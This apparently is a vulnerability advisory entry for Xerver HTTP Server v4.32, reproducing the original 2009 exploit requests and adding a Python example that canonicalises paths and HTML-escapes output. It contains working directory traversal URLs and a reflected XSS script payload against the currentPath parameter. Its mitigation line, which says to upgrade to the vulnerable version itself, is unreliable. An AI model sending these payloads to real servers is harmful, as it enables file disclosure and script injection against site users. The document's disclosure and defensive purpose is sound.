Vendor: HTTP Server
By: Stack
CVSS: 8.8 (HIGH)
Type: XSS / Directory Traversal
CWE: 22 (Path Traversal) and 79 (Cross-site Scripting)
Product Name: HTTP Server
Affected Version From: v4.32
Affected Version To: v4.32
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2009

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability

Xerver HTTP Server v4.32 is affected by a directory traversal vulnerability and a cross-site scripting (XSS) vulnerability. Both are triggered through the currentPath parameter of the chooseDirectory action, as the requests below show. An attacker can exploit the directory traversal to traverse directories and execute arbitrary code on the vulnerable system, and can exploit the XSS to inject malicious JavaScript code.

Mitigation:

Upgrade to the latest version of Xerver HTTP Server v4.32 or later.

Exploit-DB raw data:

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

# milw0rm.com [2009-09-18]
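
Both requests above abuse the same currentPath parameter, so the fix has two parts: canonicalise the path and check that it stays inside an allowed directory (CWE-22), and HTML-encode the value before it is written back into a page (CWE-79). The following is an added example, not code from Xerver or from the advisory; ALLOWED_ROOT, the function names and the sample queries are assumptions made for illustration.

```python
import html
import ntpath
from urllib.parse import parse_qs

# Hypothetical directory the chooser is allowed to browse (assumption).
ALLOWED_ROOT = r"C:\xerver\www"


def resolve_current_path(raw_query, allowed_root=ALLOWED_ROOT):
    """Return the canonical currentPath if it lies inside allowed_root, else None."""
    values = parse_qs(raw_query, keep_blank_values=True).get("currentPath", [])
    if len(values) != 1:            # missing or repeated parameter
        return None
    # parse_qs has already percent-decoded the value (%5C -> \).
    # Collapse "..", "." and mixed separators before any comparison.
    candidate = ntpath.normpath(values[0])
    if not ntpath.isabs(candidate):
        return None
    try:
        common = ntpath.commonpath([allowed_root, candidate])
    except ValueError:              # different drive letters, e.g. d:\
        return None
    # Compare whole path components, case-insensitively as Windows does.
    if ntpath.normcase(common) != ntpath.normcase(allowed_root):
        return None
    return candidate


def handle_choose_directory(raw_query):
    """Return (status, html_body) for a chooseDirectory request."""
    path = resolve_current_path(raw_query)
    if path is None:
        shown = parse_qs(raw_query).get("currentPath", [""])[0]
        # Reflect the rejected value only after HTML-encoding it.
        return 400, "<p>Invalid path: %s</p>" % html.escape(shown, quote=True)
    return 200, "<p>Browsing %s</p>" % html.escape(path, quote=True)


if __name__ == "__main__":
    # Constructed sample queries, modelled on the parameter names in the advisory.
    for q in (r"action=chooseDirectory&currentPath=C:\xerver\www\docs\..\img",
              "action=chooseDirectory&currentPath=d:%5C",
              "action=chooseDirectory&currentPath='\"><script>alert(1)</script>"):
        print(handle_choose_directory(q))
```

The containment check compares whole path components after normalisation, so a sibling directory such as C:\xerver\www2 is rejected even though it shares a string prefix with the allowed root.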